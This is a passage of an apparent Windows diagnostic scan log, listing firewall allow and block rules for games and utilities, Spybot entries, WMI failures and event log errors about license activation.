FirewallRules: [{2D1981B0-37C6-4A34-83FF-C25CDBFED6AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{750F14FD-12C1-459B-97AF-8045788F4A02}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{BFCEA83A-D98F-4CE9-AF70-0BEB8A98845D}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [TCP Query User{26F32E06-8C99-4C4E-A88C-110F0BC5DEB9}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [UDP Query User{C97AC77B-B9AB-4ACF-BD03-C9C9FD6606B1}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [{638BA54D-2635-4759-BDFC-2D46474B6D37}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{E9B6E224-F758-479F-8277-959B1D50D0E5}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1FE04074-9729-4611-A59B-6D1AD71FD0C4}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{3280B250-6F0E-46DD-8C7B-3AEE07BD6DA7}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{547FC444-5AC5-4171-8C2B-BC25DA6AD60F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{A70540E2-2F15-4B16-8EBF-9223237DB1D7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{B7FB3B81-9945-4456-AB4E-F3F462731DE7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{8D737F82-F9FE-4C2D-9234-9B6578374AE1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{281F067D-4520-4004-80F6-32A0E6089BD1}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\DeviceSetup.exe
FirewallRules: [{070E3BD2-A6A8-4891-97D6-A4D2D79B90ED}] => (Allow) LPort=5357
FirewallRules: [{BC6962E0-A9E1-45E9-8CF2-F4BA0CE26FFF}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{5561F357-1028-459A-B796-A4D123A8600D}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [UDP Query User{12859DF5-D5D5-4025-B2F8-E39E76CBB2AA}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [TCP Query User{7EE8CDD9-35C7-430D-95D8-451C632D7DCF}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [UDP Query User{F311FB22-AA27-4EC6-8AE7-1D9691835D1C}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [{33E129CF-48F9-46CD-BCC7-DD8BA14AF12D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{16831414-067E-45D0-A4D5-E68B529DB6D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{50A06F50-7F3D-4BDC-9021-237A4C0B2C27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [{1B14D338-DD94-4F52-AD5C-19A32CD5A7BC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [TCP Query User{4C44DD46-D7A9-4196-8296-EEC3056A05BA}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [UDP Query User{0E56461D-D37A-4C4F-A638-64AA8F253EF7}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [TCP Query User{7B48B31B-0302-4CA8-9E87-F07AB35F2D86}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [UDP Query User{0CAAB1E6-B8C4-4C54-8EED-E55C7FFDD98D}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [{4EE9956F-18E1-400E-BF78-B16CA5740983}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{1F4F4B1F-6EB7-49F2-BEB5-C5D20017F534}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{4E13484E-599F-4A55-8783-90ECC346BE91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{EB02CC0B-C01C-4CF1-B865-43DD5B64DA66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{56A01BA7-991A-4E71-996A-9DB735036A2A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [{164D6B17-3E23-4D7A-8EC8-9B92D2908A27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [TCP Query User{EAEAB11E-0749-492A-83F8-9E619C0825FB}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [UDP Query User{3A908214-3ACB-45F3-87BB-034C922C2A9D}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [{BC279C92-F389-439A-AA3C-F8FC24E7E3E0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{54C5FE03-560A-42F0-A953-CC57545F85F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{09DF48B2-2698-410B-B67C-DB382410B87B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{89F025E4-A12F-4D64-8F4E-65A58D8FF1E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [TCP Query User{5A0AE274-1115-456E-8097-7259AE6A531D}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [UDP Query User{15BE3688-275A-40F9-8987-65CFDE79CC41}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [{6A1EE22B-EFB5-403F-96B8-92BF6419D6D3}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4F8E8B43-EDDE-423A-AFB4-558A6797AA1B}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{587354FE-5AA4-40B2-8BE8-3F068F603006}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{2F20DB6C-39DB-42F5-B0EA-93724F169BF7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{CEE996FE-EC7E-4B5B-83A4-8D572D4710AC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{66553191-FBFE-4728-8CDE-F8A61645C7E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{BEC5AC23-37B2-40FD-8357-3AEC0079BE6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{D8EFC4A0-1905-4C93-9620-035D8AA25691}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{ACD083CA-B56C-4A63-AC29-54CF6A0CD632}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [{C888B48B-D53E-439A-AC80-145CA44D4737}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [TCP Query User{E3430B03-1B85-4352-B782-0FA31716971E}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [UDP Query User{9283DBC8-33C0-43B5-9651-F441DC55A6DF}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [TCP Query User{105F511A-3CF6-48F6-AD6C-051E9FEF4601}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [UDP Query User{41437AF0-DE88-4AFA-A0CB-DAA1B25D218B}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [{90F7FC5D-4BDC-4E25-81CF-7F277BC7091B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{DBC3A232-DF3B-4592-AAD9-5AD7C9E8EF26}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{11C7801C-EA50-48C3-B975-C7808EBB34BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [{A402D5BB-ACD3-4564-8602-D1C3AFE8A5FC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [TCP Query User{90E2740D-4865-43C6-91D4-B44837FB7951}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [UDP Query User{91DD21ED-6B7D-4517-ABA8-25131C27A725}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [{0E9497B1-EDF3-4BDA-84E8-C4AF819F2B1F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [{DE8F4F0F-22D5-4E28-9D99-3E79A12D25D0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [TCP Query User{392BB40D-09A3-46AE-B483-4A87F354BBE3}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{02BF2D2B-EBEA-47F5-B4FA-A51CBA9A9C83}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [TCP Query User{94065ED6-5B78-4044-AE30-8E49C3C21237}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [UDP Query User{27CA16C0-9AB9-4376-AE22-9AA13C815A01}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [TCP Query User{FF88AE80-179E-4787-99D1-9D9601F0F888}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{DE54AA93-CF4F-4466-966B-16CCAAB5E2AF}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A5EA0B5-372C-4636-865C-96EB70C2B9F8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{0289A623-6B29-4123-AFAD-83CC04D6E3D1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{094AA815-F657-443A-BD7D-E8BF39CB1875}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [{E6B49A1F-10BF-4C9D-939D-AF1B9D814811}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [TCP Query User{1B0D9DFE-155E-4872-9EA3-EB0B754A22E9}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [UDP Query User{9BB74597-A81A-4634-BF7E-27D90AAE1515}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [TCP Query User{A7B37CFC-0381-42BE-827A-63D6A4C34FC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [UDP Query User{639643C1-BDF4-477C-AD00-3FB55B221BC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [{2CAC80C4-1DD7-4ED9-AAC9-FA728E9C64C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{59E06B2C-F0B8-4FD2-8C95-E33BA71B7A52}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [TCP Query User{49813E33-F982-4C58-AABE-7AE5DDBB53B7}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [UDP Query User{97BB371E-37DD-4871-A9B2-479DDB116DAB}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [TCP Query User{AE8E1853-0B69-458C-A91B-357C96D672CA}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [UDP Query User{6309873B-0312-49FF-93AF-7FC0CEE92B2B}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [TCP Query User{2B66DABB-08DB-4347-B883-42E57A1977E7}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{B796F551-898A-414D-9130-087E8CDA4764}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{943F2851-ECFB-4B76-8DB5-790A4F3A2A60}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{8C09611D-DED5-4A47-9CAD-6B5D30F07DEF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [TCP Query User{B57AE43D-9BD7-4625-9167-9682B1214B8E}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [UDP Query User{F54F1B03-C911-4118-898E-C4C6741ED54C}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [{A53DA5D6-B330-4B94-9BAD-CBFA322598D2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{0989A382-7FB7-49BD-8948-BB4D18E829E3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{86ECB8A3-9E4D-4BA6-8848-DF1BC1D6BD38}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{FB8EF655-CB2D-40B2-BC0A-EE99B096DB04}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{1AABF3A0-0D09-40C2-A9AA-0CB0D8D57BF0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [{D9690832-509B-45D6-9409-03836DE16213}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [TCP Query User{4D4A7CFE-E3AD-42FE-9ABC-F15ACA432415}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [UDP Query User{B43EA068-17FF-4825-80F1-B7BEA12DBA14}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [{E12C1E12-8918-47BF-9BF0-BB81766D03BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [{A2AE5D14-6FD2-41C1-9980-F2E7E63537F2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [TCP Query User{EAEA4C7A-39C4-439B-A5A3-BC1B39F3E633}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [UDP Query User{AE9B677E-82BF-4BD9-A500-9799B4349C4F}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [{C07BD8B9-20CF-40B2-A390-051F5AF605EF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [{7E02B52F-A3D5-4771-94A8-9E1BC9A92AE0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [TCP Query User{0BC64E8E-D097-4302-8DE7-C52133F3F820}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{3F6D9C6D-0D88-42B3-A45B-22E3876F89E7}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{41295780-229B-4A41-8874-FA27D76D9D18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{7FEB6C09-A3FC-4FE8-8C2F-A73DF3A26029}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{AE43EF82-F6F7-4C66-9E0E-04BA99ADC5A3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [{72A961A6-6F51-4295-8377-36F54B3EDD2D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [TCP Query User{51297500-255C-4308-A33D-A59A0226532F}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [UDP Query User{C086CD1D-6E88-4B53-8234-63A7F7094C27}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [{B0F4256D-3EB3-4DDB-9525-A5CC400DBC01}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{FD789251-9926-4417-AB50-A72ED2F1CCED}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{478551DD-BFAA-4D54-B66F-4825510EC57B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{E87E1A1E-46C6-4F95-A1E6-4CB2F188F244}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{4F8620B0-3C73-4A37-BE73-1E679DB228A9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{830B508E-2878-4305-82C9-B9B9ADF9AD8D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{ACB155F9-DBDA-4D65-B643-959BE30D4175}] => (Allow) C:\Program Files\Vivaldi\Application\vivaldi.exe
FirewallRules: [TCP Query User{597DC14B-49DB-40B6-A24A-E3D9953A457D}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{A9C2F1E3-849E-4D06-93ED-F0D6A0381D0A}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{6E206845-F48F-4619-A3DA-A5516D9D4C5A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{CE39CD5A-E51C-48D9-A1E7-2DA4AEF0C6CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{5D35B3A2-F05A-47E7-A169-9FB82F430BF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{14725769-536B-4335-A537-4BBAD8646C91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{2FFEA717-74A2-4877-89D2-B30E836B1AEE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{9EC8F931-3B33-4C1E-8707-F3D9F5D2C37B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{87FC258F-5BEE-4C60-9620-2854B57C3376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{6692C423-96D3-48B0-BE61-0A685AA7C369}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [TCP Query User{746EE4C5-88A1-49CA-AE82-C024362EC325}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [UDP Query User{1CB765AF-56AD-4340-96E5-5AF7DDC35300}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [{6AA353F1-7DDF-490A-B825-0C9CF5C0597D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{2253BB91-25A5-41A5-A8B1-51264D44C1DC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{F128730D-D7BE-467C-A4BB-0C43215DC4C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{92BD8855-E433-4E7C-9DA1-BC4ADC152C43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{4DF2E569-34C8-428A-A8C6-689A8D3132A5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{180A7648-B41B-49EC-9970-3A15A5246B34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{CC32B82F-7235-40CF-890F-473BCA9F601D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{45300479-8F32-4A67-916B-F7D53A9DFB52}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FB9D5CC2-2B07-4B7F-9F63-36452DB69316}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{5B525BF6-E027-4A85-98DB-0B69127E01F5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{E8FF906C-0588-47BE-96E9-0BE363415543}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{986BA986-DD80-4802-9A0A-D9A8D1431284}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{CE43BA91-078E-4D0B-AB12-53C5C0B5839A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

Could not list restore points
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Could not list Devices. Check "winmgmt" service or repair WMI.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/02/2018 11:13:40 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 11:12:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 11:12:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 10:24:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:26:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
